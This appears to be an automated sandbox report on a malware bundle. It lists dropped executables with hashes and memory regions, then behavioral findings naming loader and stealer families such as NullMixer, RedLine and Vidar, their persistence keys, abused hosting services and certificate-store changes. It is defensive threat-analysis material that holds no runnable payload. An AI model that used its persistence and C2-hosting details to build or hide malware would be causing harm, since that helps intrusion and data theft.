C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
| MD5 | c0d18a829910babf695b4fdaea21a047 |
| SHA1 | 236a19746fe1a1063ebe077c8a0553566f92ef0f |
| SHA256 | 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98 |
| SHA512 | cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe
| MD5 | 7e06ee9bf79e2861433d6d2b8ff4694d |
| SHA1 | 28de30147de38f968958e91770e69ceb33e35eb5 |
| SHA256 | e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f |
| SHA512 | 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe
| MD5 | 0965da18bfbf19bafb1c414882e19081 |
| SHA1 | e4556bac206f74d3a3d3f637e594507c30707240 |
| SHA256 | 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff |
| SHA512 | fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b |
memory/3984-94-0x0000000000010000-0x0000000000018000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe
| MD5 | 3f9f7dfccefb41726d6b99e434155467 |
| SHA1 | f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1 |
| SHA256 | 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34 |
| SHA512 | e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe
| MD5 | 2b32e3fb6d4deb5e9f825f9c9f0c75a6 |
| SHA1 | 2049fdbbe5b72ff06a7746b57582c9faa6186146 |
| SHA256 | 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2 |
| SHA512 | ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe
| MD5 | 5866ab1fae31526ed81bfbdf95220190 |
| SHA1 | 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f |
| SHA256 | 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e |
| SHA512 | 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5 |
memory/3744-55-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3744-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3744-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3744-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3744-47-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3744-46-0x000000006494A000-0x000000006494F000-memory.dmp
memory/3744-44-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3744-43-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/3744-38-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4948-121-0x00000000052F0000-0x000000000538C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
| MD5 | ad0aca1934f02768fd5fedaf4d9762a3 |
| SHA1 | 0e5b8372015d81200c4eff22823e854d0030f305 |
| SHA256 | dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388 |
| SHA512 | 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7 |
memory/2180-138-0x0000000000010000-0x0000000000020000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 01ad10e59fa396af2d5443c5a14c1b21 |
| SHA1 | f209a4f0bb2a96e3ee6a55689e7f00e79c04f722 |
| SHA256 | bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137 |
| SHA512 | 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02 |
memory/4948-120-0x0000000005130000-0x000000000513A000-memory.dmp
memory/3692-143-0x0000000002230000-0x0000000002314000-memory.dmp
memory/2676-155-0x0000000000400000-0x00000000004E4000-memory.dmp
memory/3744-165-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/3744-171-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3744-170-0x0000000001420000-0x00000000014AF000-memory.dmp
memory/3744-169-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3744-161-0x0000000000400000-0x0000000000A07000-memory.dmp
memory/3744-168-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3744-167-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2104-173-0x0000000000400000-0x00000000032F3000-memory.dmp
memory/4948-174-0x0000000002710000-0x0000000002722000-memory.dmp
memory/1016-184-0x0000000000400000-0x0000000003346000-memory.dmp
memory/2180-185-0x00000000025F0000-0x00000000025FE000-memory.dmp
memory/2180-186-0x0000000002620000-0x0000000002632000-memory.dmp
memory/4948-199-0x0000000009020000-0x00000000090AC000-memory.dmp
memory/4948-200-0x0000000005430000-0x000000000544E000-memory.dmp
memory/2040-202-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1cr.exe.log
| MD5 | 8ec831f3e3a3f77e4a7b9cd32b48384c |
| SHA1 | d83f09fd87c5bd86e045873c231c14836e76a05c |
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
| SHA512 | 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3 |
memory/4648-209-0x0000000002B60000-0x0000000002B96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
| MD5 | a628baa97881fa5528009c9470cadee0 |
| SHA1 | 583aa730e302fe0015cdb0dee4e279f193d66d87 |
| SHA256 | e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5 |
| SHA512 | c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf |
memory/2040-212-0x0000000005DF0000-0x0000000006408000-memory.dmp
memory/2040-213-0x0000000003230000-0x0000000003242000-memory.dmp
memory/2040-214-0x0000000005850000-0x000000000588C000-memory.dmp
memory/4648-215-0x00000000057B0000-0x0000000005DD8000-memory.dmp
memory/2040-216-0x0000000005890000-0x00000000058DC000-memory.dmp
memory/4648-217-0x00000000055A0000-0x00000000055C2000-memory.dmp
memory/4648-219-0x00000000056B0000-0x0000000005716000-memory.dmp
memory/4648-218-0x0000000005640000-0x00000000056A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vwvvhl0k.xs3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4648-229-0x0000000005EE0000-0x0000000006234000-memory.dmp
memory/2040-232-0x0000000005AD0000-0x0000000005BDA000-memory.dmp
memory/4648-233-0x0000000006470000-0x000000000648E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS299B.tmp\Install.cmd
| MD5 | a3c236c7c80bbcad8a4efe06a5253731 |
| SHA1 | f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07 |
| SHA256 | 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d |
| SHA512 | dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc |
memory/4648-235-0x0000000007440000-0x0000000007472000-memory.dmp
memory/4648-236-0x0000000074FB0000-0x0000000074FFC000-memory.dmp
memory/4648-246-0x0000000006A00000-0x0000000006A1E000-memory.dmp
memory/4648-248-0x0000000007680000-0x0000000007723000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a0486d6f8406d852dd805b66ff467692 |
| SHA1 | 77ba1f63142e86b21c951b808f4bc5d8ed89b571 |
| SHA256 | c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be |
| SHA512 | 065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a |
memory/4648-254-0x0000000007DE0000-0x000000000845A000-memory.dmp
memory/4648-255-0x00000000077A0000-0x00000000077BA000-memory.dmp
memory/4648-256-0x0000000007810000-0x000000000781A000-memory.dmp
memory/4648-266-0x0000000007A20000-0x0000000007AB6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | dc058ebc0f8181946a312f0be99ed79c |
| SHA1 | 0c6f376ed8f2d4c275336048c7c9ef9edf18bff0 |
| SHA256 | 378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a |
| SHA512 | 36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa |
\??\pipe\LOCAL\crashpad_3076_JQQLSOGSOTFHNEIW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | efe4c40a4047904ba49903c0916832ab |
| SHA1 | 7ca7e3712f047343e52d753648f6f7c4787f3706 |
| SHA256 | 6aa35055139b97ceb0f01a2a6f78ac175d19bdd0b7366c98d6f5da567cc8a4a4 |
| SHA512 | 4455845884f5f273e50bd34910078caa442971dff64d295994c9d2c2d0cc68301a3a88bdae70e97f49e8ad87a2779d23a2215afab2a446b1843d278e5c3c6b45 |
memory/4648-274-0x00000000079A0000-0x00000000079B1000-memory.dmp
memory/4648-275-0x00000000079D0000-0x00000000079DE000-memory.dmp
memory/4648-276-0x00000000079E0000-0x00000000079F4000-memory.dmp
memory/4648-277-0x0000000007AE0000-0x0000000007AFA000-memory.dmp
memory/4648-278-0x0000000007AC0000-0x0000000007AC8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4119bdbeae429197de1d78250e3a89a6 |
| SHA1 | bd2a79c82540eccf13e14e657a4dd21f4a90b6f6 |
| SHA256 | 8db4af0bdfe9b061291db46510b8c5a4abe0bcd0d2e3ac0dde9a21eb8fbfa372 |
| SHA512 | fe468d5bc2c39efcaa0e309b2f51ad9c66e810d7ce7687e744de4ce01f5036da02fc70159aeeb9a0a827c9d7987b9e52f2f949f1a65fef6740716904dc57c34b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1e7dc506a2b8ed7ed0fcb8d42619fe5d |
| SHA1 | 9d332b0a8724087c0e93611473b1d0e278d82301 |
| SHA256 | d91f02b5e6b1f70abf110663d378d1f655d137b7b515ab737dccc3435c9926ba |
| SHA512 | 2dc6018f38e6a66aaaf92038de692fdbca033932663adfa4320e16ca791cdddb9befe0844686a269e0dddcb5869021476283009a9e188171c2ba5a8f1361c5be |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | be0b4b1c809dc419f44b990378cbae31 |
| SHA1 | 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806 |
| SHA256 | 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53 |
| SHA512 | 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24 |
memory/5648-326-0x0000000000F60000-0x0000000000F66000-memory.dmp
memory/5796-332-0x0000000000A30000-0x0000000000A50000-memory.dmp
memory/5796-329-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-331-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-336-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-337-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-335-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-333-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-334-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-338-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-339-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5796-366-0x0000000140000000-0x0000000140786000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 4bc8a3540a546cfe044e0ed1a0a22a95 |
| SHA1 | 5387f78f1816dee5393bfca1fffe49cede5f59c1 |
| SHA256 | f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca |
| SHA512 | e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-06 12:12
Reported
2024-12-06 12:15
Platform
win7-20240903-en
Max time kernel
63s
Max time network
150s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\e4f0738cc5646a38.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2992 set thread context of 868 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7AE71BD1-B3CB-11EF-A5D8-F2DF7204BD4F} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe | N/A |
